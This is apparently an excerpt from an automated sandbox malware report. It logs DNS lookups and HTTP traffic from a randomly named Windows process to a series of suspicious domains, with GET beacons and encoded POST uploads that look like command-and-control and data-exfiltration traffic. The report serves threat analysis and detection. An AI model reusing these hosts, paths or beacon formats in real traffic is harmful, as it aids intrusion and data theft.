Nov 5, 2024 07:12:10.767103910 CET	192.168.2.4	1.1.1.1	0xb94e	Standard query (0)	www.trifecta.center	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:12:24.345316887 CET	192.168.2.4	1.1.1.1	0x27e6	Standard query (0)	www.wcp95.top	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:12:38.596138954 CET	192.168.2.4	1.1.1.1	0x3dc9	Standard query (0)	www.gokulmohan.online	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:12:52.439989090 CET	192.168.2.4	1.1.1.1	0x6086	Standard query (0)	www.wddb97.top	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:13:06.801549911 CET	192.168.2.4	1.1.1.1	0xdc2a	Standard query (0)	www.xtelify.tech	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:13:14.915222883 CET	192.168.2.4	1.1.1.1	0xf12b	Standard query (0)	www.roopiedutech.online	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:13:31.486118078 CET	192.168.2.4	1.1.1.1	0x8f34	Standard query (0)	www.comvq.fun	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:13:45.767937899 CET	192.168.2.4	1.1.1.1	0xb289	Standard query (0)	www.harmonid.life	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:13:59.408135891 CET	192.168.2.4	1.1.1.1	0x80a7	Standard query (0)	www.figa1digital.services	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 5, 2024 07:11:39.690196037 CET	1.1.1.1	192.168.2.4	0xf22d	No error (0)	www.iuyi542.xyz	iuyi542.xyz		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 07:11:39.690196037 CET	1.1.1.1	192.168.2.4	0xf22d	No error (0)	iuyi542.xyz		38.47.237.27	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:11:56.561456919 CET	1.1.1.1	192.168.2.4	0xb06f	No error (0)	www.vrxlzluy.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:11:56.561456919 CET	1.1.1.1	192.168.2.4	0xb06f	No error (0)	www.vrxlzluy.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:12:10.778795004 CET	1.1.1.1	192.168.2.4	0xb94e	No error (0)	www.trifecta.center	trifecta.center		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 07:12:10.778795004 CET	1.1.1.1	192.168.2.4	0xb94e	No error (0)	trifecta.center		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:12:10.778795004 CET	1.1.1.1	192.168.2.4	0xb94e	No error (0)	trifecta.center		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:12:24.757232904 CET	1.1.1.1	192.168.2.4	0x27e6	No error (0)	www.wcp95.top	wcp95.top		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 07:12:24.757232904 CET	1.1.1.1	192.168.2.4	0x27e6	No error (0)	wcp95.top		154.23.184.95	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:12:38.636172056 CET	1.1.1.1	192.168.2.4	0x3dc9	No error (0)	www.gokulmohan.online		172.67.185.22	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:12:38.636172056 CET	1.1.1.1	192.168.2.4	0x3dc9	No error (0)	www.gokulmohan.online		104.21.64.124	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:12:53.001337051 CET	1.1.1.1	192.168.2.4	0x6086	No error (0)	www.wddb97.top	wddb97.top		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 07:12:53.001337051 CET	1.1.1.1	192.168.2.4	0x6086	No error (0)	wddb97.top		206.119.82.172	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:13:06.825634956 CET	1.1.1.1	192.168.2.4	0xdc2a	Name error (3)	www.xtelify.tech	none	none	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:13:15.659439087 CET	1.1.1.1	192.168.2.4	0xf12b	No error (0)	www.roopiedutech.online	roopiedutech.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 07:13:15.659439087 CET	1.1.1.1	192.168.2.4	0xf12b	No error (0)	roopiedutech.online		103.191.208.137	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:13:31.524418116 CET	1.1.1.1	192.168.2.4	0x8f34	No error (0)	www.comvq.fun		3.111.160.216	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:13:46.007867098 CET	1.1.1.1	192.168.2.4	0xb289	No error (0)	www.harmonid.life		203.161.49.193	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:13:59.505474091 CET	1.1.1.1	192.168.2.4	0x80a7	No error (0)	www.figa1digital.services		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:13:59.505474091 CET	1.1.1.1	192.168.2.4	0x80a7	No error (0)	www.figa1digital.services		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.iuyi542.xyz

www.vrxlzluy.shop

www.trifecta.center

www.wcp95.top

www.gokulmohan.online

www.wddb97.top

www.roopiedutech.online

www.comvq.fun

www.harmonid.life

www.figa1digital.services

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	38.47.237.27	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:11:39.707813978 CET	444	OUT	GET /b6lw/?FLL4t=FO9SkkJ/zSkBY2gKE3XjGE22XLVH89fAFT5UFdCZW5l7B5PRw+4+Jbotmp48rM/okqGzRuEUvPhZhQzUiZGHGB1tKbDdMwj50dTtgpwp3v/R5pIWGJdc6oQ=&ezK=xFOxVPb0UzRXXPy HTTP/1.1 Host: www.iuyi542.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Nov 5, 2024 07:11:40.382801056 CET	170	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 05 Nov 2024 06:11:40 GMT Content-Type: text/html Content-Length: 167433 Connection: close ETag: "652641ca-28e09"
Nov 5, 2024 07:11:40.382934093 CET	1236	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 20 50 61 67 65 3c Data Ascii: <html lang="en"><head> <meta charset="UTF-8"> <title>CodePen - 404 Page</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>button,hr,input{overflow:visible}audio,canvas,progress,video{dis
Nov 5, 2024 07:11:40.382944107 CET	212	IN	Data Raw: 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 73 75 62 6d Data Ascii: ne-height:1.15;margin:0}button,input{}button,select{text-transform:none}[type=submit], [type=reset],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inn
Nov 5, 2024 07:11:40.382955074 CET	1236	IN	Data Raw: 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 Data Ascii: er,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:ButtonText dotted 1px}fieldset{border:1
Nov 5, 2024 07:11:40.382966042 CET	1236	IN	Data Raw: 3b 2d 2d 6f 72 61 6e 67 65 3a 23 66 64 37 65 31 34 3b 2d 2d 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 67 72 65 65 6e 3a 23 32 38 61 37 34 35 3b 2d 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 63 79 61 6e 3a 23 31 37 61 32 62 38 3b 2d Data Ascii: ;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:
Nov 5, 2024 07:11:40.382975101 CET	424	IN	Data Raw: 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 5b 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 5d 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 68 72 7b 62 Data Ascii: xt-align:left;background-color:#fff}[tabindex="-1"]:focus{outline:0!important}hr{box-sizing:content-box;height:0;overflow:visible}h1,h2,h3,h4,h5,h6{margin-top:0;margin-bottom:.5rem}p{margin-top:0;margin-bottom:1rem}abbr[data-original-title],ab
Nov 5, 2024 07:11:40.382987022 CET	1236	IN	Data Raw: 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75 Data Ascii: l;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-style:italic}b,strong{font-weight:bolder}small{f
Nov 5, 2024 07:11:40.382994890 CET	212	IN	Data Raw: 6f 6d 3a 2e 35 72 65 6d 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d Data Ascii: om:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}b
Nov 5, 2024 07:11:40.383007050 CET	1236	IN	Data Raw: 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d Data Ascii: utton,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button
Nov 5, 2024 07:11:40.383018017 CET	212	IN	Data Raw: 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31 Data Ascii: bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-s
Nov 5, 2024 07:11:40.388382912 CET	1236	IN	Data Raw: 69 7a 65 3a 31 72 65 6d 7d 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 7d 2e 64 69 73 70 6c 61 79 2d 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 36 72 65 6d 3b 66 6f 6e 74 2d 77 65 Data Ascii: ize:1rem}.lead{font-size:1.25rem;font-weight:300}.display-1{font-size:6rem;font-weight:300;line-height:1.2}.display-2{font-size:5.5rem;font-weight:300;line-height:1.2}.display-3{font-size:4.5rem;font-weight:300;line-height:1.2}.display-4{font-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	188.114.96.3	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:11:56.577744961 CET	708	OUT	POST /o91n/ HTTP/1.1 Host: www.vrxlzluy.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 202 Content-Type: application/x-www-form-urlencoded Origin: http://www.vrxlzluy.shop Referer: http://www.vrxlzluy.shop/o91n/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 65 6a 42 61 32 59 47 74 50 65 6f 70 49 41 64 75 6a 74 31 70 61 41 52 33 35 43 58 58 6d 79 61 49 2f 6d 35 59 48 59 6e 51 37 74 4b 51 73 72 2b 5a 48 2b 2b 4c 42 55 48 79 4c 6c 38 66 53 39 67 7a 36 6d 48 4c 42 63 67 65 33 57 75 77 34 2b 45 45 79 62 50 59 56 2b 6f 79 45 77 6b 78 49 74 4d 4b 48 76 58 46 4f 6b 46 61 6d 4e 79 49 57 47 64 58 61 34 6f 4b 74 6c 5a 54 51 56 30 6b 61 68 76 76 4b 50 79 32 4e 74 7a 72 6c 76 62 2f 64 34 73 76 61 48 5a 67 47 52 6c 2f 48 44 66 32 30 55 54 50 51 63 56 72 5a 63 42 5a 75 5a 4f 58 42 4f 65 70 6b 68 69 53 54 32 32 75 34 4d 4c 32 73 61 4f 39 6a 77 3d 3d Data Ascii: FLL4t=ejBa2YGtPeopIAdujt1paAR35CXXmyaI/m5YHYnQ7tKQsr+ZH++LBUHyLl8fS9gz6mHLBcge3Wuw4+EEybPYV+oyEwkxItMKHvXFOkFamNyIWGdXa4oKtlZTQV0kahvvKPy2Ntzrlvb/d4svaHZgGRl/HDf20UTPQcVrZcBZuZOXBOepkhiST22u4ML2saO9jw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	188.114.96.3	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:11:59.151470900 CET	728	OUT	POST /o91n/ HTTP/1.1 Host: www.vrxlzluy.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 222 Content-Type: application/x-www-form-urlencoded Origin: http://www.vrxlzluy.shop Referer: http://www.vrxlzluy.shop/o91n/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 65 6a 42 61 32 59 47 74 50 65 6f 70 4a 6a 46 75 68 4b 42 70 4c 51 52 30 6c 53 58 58 6f 53 61 4d 2f 6d 31 59 48 63 58 41 37 66 65 51 76 4a 57 5a 57 50 2b 4c 41 55 48 79 45 46 38 51 59 64 67 38 36 6d 44 63 42 64 63 65 33 58 4f 77 34 36 55 45 79 6f 6e 66 55 75 6f 30 4d 51 6b 6b 56 64 4d 4b 48 76 58 46 4f 6b 35 30 6d 4e 71 49 57 32 4e 58 49 4b 4d 46 75 6c 5a 51 41 46 30 6b 65 68 75 48 4b 50 79 45 4e 75 33 52 6c 74 6a 2f 64 35 63 76 5a 57 5a 6a 50 52 6c 35 61 54 65 31 30 6c 32 61 49 2b 6b 39 52 76 52 65 6f 70 65 44 41 49 54 7a 31 51 44 46 42 32 53 64 6c 4c 43 43 68 5a 7a 30 34 77 32 72 6d 46 6d 62 59 75 56 43 70 67 44 31 56 72 4d 59 38 70 49 3d Data Ascii: FLL4t=ejBa2YGtPeopJjFuhKBpLQR0lSXXoSaM/m1YHcXA7feQvJWZWP+LAUHyEF8QYdg86mDcBdce3XOw46UEyonfUuo0MQkkVdMKHvXFOk50mNqIW2NXIKMFulZQAF0kehuHKPyENu3Rltj/d5cvZWZjPRl5aTe10l2aI+k9RvReopeDAITz1QDFB2SdlLCChZz04w2rmFmbYuVCpgD1VrMY8pI=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	188.114.96.3	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:01.710527897 CET	10810	OUT	POST /o91n/ HTTP/1.1 Host: www.vrxlzluy.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 10302 Content-Type: application/x-www-form-urlencoded Origin: http://www.vrxlzluy.shop Referer: http://www.vrxlzluy.shop/o91n/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 65 6a 42 61 32 59 47 74 50 65 6f 70 4a 6a 46 75 68 4b 42 70 4c 51 52 30 6c 53 58 58 6f 53 61 4d 2f 6d 31 59 48 63 58 41 37 66 47 51 73 36 75 5a 48 63 47 4c 53 6b 48 79 4e 6c 39 33 59 64 67 68 36 6d 37 51 42 64 51 30 33 53 4b 77 71 74 38 45 37 35 6e 66 64 75 6f 30 54 67 6c 44 49 74 4d 66 48 70 33 42 4f 6b 4a 30 6d 4e 71 49 57 77 4a 58 66 49 6f 46 6f 6c 5a 54 51 56 30 6f 61 68 76 71 4b 50 4b 2b 4e 74 62 42 6c 64 44 2f 65 5a 4d 76 66 67 74 6a 41 52 6c 37 5a 54 65 58 30 6c 4c 4b 49 2b 6f 48 52 73 4e 34 6f 72 43 44 42 35 69 71 70 45 33 7a 43 57 43 36 2f 70 6a 67 6f 36 54 69 39 77 66 58 70 6e 65 69 59 36 4a 38 6b 77 43 63 4f 49 63 75 76 39 74 51 71 78 39 58 55 38 38 6e 73 73 6c 50 4d 54 67 78 7a 73 32 36 75 7a 34 38 5a 32 52 34 59 33 4a 52 63 72 33 31 6d 32 67 79 34 31 51 79 72 77 42 4f 76 56 72 54 6c 78 53 59 48 5a 52 56 6f 7a 4b 69 6a 49 6e 4c 47 66 4c 4c 70 67 7a 77 4b 6e 63 79 2f 54 2f 79 69 39 66 74 49 70 65 79 4f 62 49 45 36 76 4c 34 76 58 68 7a 31 74 30 4a 67 6c 52 44 6e 4b 6b 2b [TRUNCATED] Data Ascii: FLL4t=ejBa2YGtPeopJjFuhKBpLQR0lSXXoSaM/m1YHcXA7fGQs6uZHcGLSkHyNl93Ydgh6m7QBdQ03SKwqt8E75nfduo0TglDItMfHp3BOkJ0mNqIWwJXfIoFolZTQV0oahvqKPK+NtbBldD/eZMvfgtjARl7ZTeX0lLKI+oHRsN4orCDB5iqpE3zCWC6/pjgo6Ti9wfXpneiY6J8kwCcOIcuv9tQqx9XU88nsslPMTgxzs26uz48Z2R4Y3JRcr31m2gy41QyrwBOvVrTlxSYHZRVozKijInLGfLLpgzwKncy/T/yi9ftIpeyObIE6vL4vXhz1t0JglRDnKk+qbvzEwRpETa2yPHupD+YrmCfUPIT9N9mAeOI6aWn9iF9dr7DPCJ1StlB9KqcxOZqr4G/KiJmNYNWeBxk/ot3R7kYOSqJtc/GSy9AMBc4inPHQ/Z3VTW5VCrD5kx1s8z/HRqcRiDtXY8xf0xUTzgLYw4fkrzyZjJdxN4lVo2MObrz6eDXWZVICNF0NgCu0Ie+H8tzy69RHvCPhCY2dssPol2IyZtDngmQXHRkQ1O673qIq400AlJn4N2XiUsBuPqwurJwp/Jt1Qzi+shzcHd2mnFM85t7INCx+fLWavy5jyXHy1Ld6J3c4SDfi+15K/L2yGM+vNIlcxLaxPwXFh3uIr89SxSPJB3n8C+tsXJpQUQ9RtwoRM21cO9G73XNELmEtZmWbo/+4O76+0NDOjVVZvy+5tBHjmEhZJ4/QReSCVOZCI0Sm9OV1xhps12UshaUS7H/IW8qn+95WRoSmENtsIUEtpU7ccYY5TvGRvF/W3k8C3GY0RLUECnewusCZN96FWcMjHzvLi442+ByHul5QVzTJD4j4PrwyfAHVK/UyAczQkHsE+TTmox1ujCAe3IY236hY019JpR2OeTrnZzycEQK5NddAREEtJKB35CKLaww4qEP068S4jA3f1losPsjGqbGH4rMY0cZdvPHDxpf4KoZZwvJFTtmdo [TRUNCATED]
Nov 5, 2024 07:12:03.191755056 CET	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 06:12:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-litespeed-tag: 59f_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 link: <https://vrxlzluy.shop/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zem9MhqEVTnIVzROOp7XG%2Fs%2B%2F4BO2RADfyt4mM0y8wNosg3DtA%2F39YY3E5oo8BNdHZYx89P0x8dU06QTFg%2FdDX%2Fz%2FcW1bomHbTYJn9Qn8D%2F74uQb%2F0Oz8UmEO5Kzp97o4%2F%2FqRw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddab09a0cd06bda-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=6&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10810&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 63 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 1a 69 73 9c 38 f6 f3 f8 57 60 5c d3 86 09 d0 d0 87 db a6 4d 26 3b 39 f6 a8 cc 38 15 27 b5 b5 65 bb 52 02 3d 68 39 20 b1 92 e8 23 3d fc f7 2d 01 dd 4d 1f 8e 3d de d9 75 2a 09 3c bd 5b ef 92 f0 e5 f1 9b ab d7 9f fe f5 e1 ad 36 91 59 fa f2 e8 52 fd a7 a5 88 26 81 0e d4 fe 7c ad 6b 39 87 98 cc 03 9d 25 be 36 91 32 17 7e b7 cb 92 dc c9 a0 4b c5 89 ae 45 29 12 22 d0 53 86 30 a1 89 2d 88 04 8d 32 fb 5e e8 8a 1d 20 fc f2 e8 87 cb 0c 24 d2 a2 09 e2 02 64 a0 7f fe f4 ce 3e d7 b5 ae 5a 49 09 fd Data Ascii: dceis8W`\M&;98'eR=h9 #=-M=u*<[6YR&\|k9%62~KE)"S0-2^ $d>ZI
Nov 5, 2024 07:12:03.191767931 CET	1236	IN	Data Raw: aa 71 48 03 3d e7 2c 26 29 e8 da 84 43 1c e8 4a 96 df ed 26 59 9e 38 8c 27 dd 79 4c bb 9e b7 4f 45 68 12 a2 e8 6b 9b 4c a9 38 e5 f3 f4 5b 5a 2c 1c 31 61 79 77 9e a5 3c 8f 9c 7c 92 57 0c 8e 7e 50 3f 97 22 e2 24 97 2f 31 8b 8a 0c a8 74 56 0f 6f 53 Data Ascii: qH=,&)CJ&Y8'yLOEhkL8[Z,1ayw<\|W~P?"$/1tVoS+~Cha^\|A$Setj$aP>7-CmX6Z,M!FveSqkr`%J!}yl5 M4!\\|C-\hD
Nov 5, 2024 07:12:03.191788912 CET	424	IN	Data Raw: 29 f0 c5 e6 a0 03 96 34 97 cd 22 04 41 c0 6f e4 5d 69 6e 1c 5c ac 1c 2c 66 44 b9 5f 9a cb 08 09 d0 e3 14 25 ba df 10 2a 36 fa 6d 81 cf fb d1 6d 81 e3 b8 7f 5b c4 e0 c6 b7 45 cf 75 f1 6d d1 3b 43 a3 1a a2 3f 88 16 6e a1 99 3f 1f 7b fe f1 36 5b 1c Data Ascii: )4"Ao]in\,fD_%6mm[Eum;C?n?{6[s_]NxWm{[lzg8?dB =<g.{TR/\zZ]a Y6MQbB,VCWMYHcP!rEZ5}
Nov 5, 2024 07:12:03.191801071 CET	1236	IN	Data Raw: 58 56 f5 42 4e 08 4d fc 63 d7 da bc bd 9d 47 90 cb 77 29 52 f0 d2 82 aa 72 36 12 b7 5c 40 1c 84 f1 db 29 50 a9 4e 34 aa bb 18 fa 9b ab 5f 5f d7 13 d1 7b 86 30 60 dd 02 6b c9 68 04 d5 36 94 75 e1 db 63 26 6b 7f d1 60 0d d9 b4 1e 08 aa 8e 91 ab eb Data Ascii: XVBNMcGw)Rr6\@)PN4__{0`kh6uc&k`,c$bc:!zt::-x[Wsw]0^stY;hcm5U=-4*eT:?ED9NM]UWC,47VR+0#un/nv:0c;jnMs['
Nov 5, 2024 07:12:03.191812992 CET	466	IN	Data Raw: d4 af 8b d5 ed b8 1f a7 30 b7 85 44 5c ee 13 34 3c 77 49 56 e6 ee a2 d7 a6 1c 14 00 14 ef e3 8b 1c 45 60 87 20 67 00 74 8f 6e 6b b5 74 ea a3 95 ad 66 46 e0 95 03 97 51 4a 72 9f ab 9b 3e 2f 9f 5b ad bf e6 78 c6 38 b6 67 1c e5 7e 1d 06 ad d1 a4 99 Data Ascii: 0D\4<wIVE` gtnktfFQJr>/[x8g~=+bcHN\|BHchf3S6'cHW}VCU;Rm*"5`0[YNP\|\MgJy0k~>A>W!!b"Q,fW/(~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49756	188.114.96.3	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:04.258071899 CET	446	OUT	GET /o91n/?FLL4t=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus+09XFbP+3c72g6WMTcCeHGHsKE18csM01zHbC+82zyOO8bx37pnUbuImGHRIRsUOfuHIGVgprfqSQRJiadd1v3E=&ezK=xFOxVPb0UzRXXPy HTTP/1.1 Host: www.vrxlzluy.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Nov 5, 2024 07:12:05.751194954 CET	1236	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 05 Nov 2024 06:12:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 x-redirect-by: WordPress location: https://vrxlzluy.shop/o91n/?FLL4t=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus+09XFbP+3c72g6WMTcCeHGHsKE18csM01zHbC+82zyOO8bx37pnUbuImGHRIRsUOfuHIGVgprfqSQRJiadd1v3E=&ezK=xFOxVPb0UzRXXPy x-litespeed-cache-control: public,max-age=3600 x-litespeed-tag: 59f_HTTP.404,59f_HTTP.301,59f_404,59f_URL.5d76aa37dbc043a4dec01f7366a41e31,59f_ x-litespeed-cache: miss cf-cache-status: DYNAMIC Report-To: 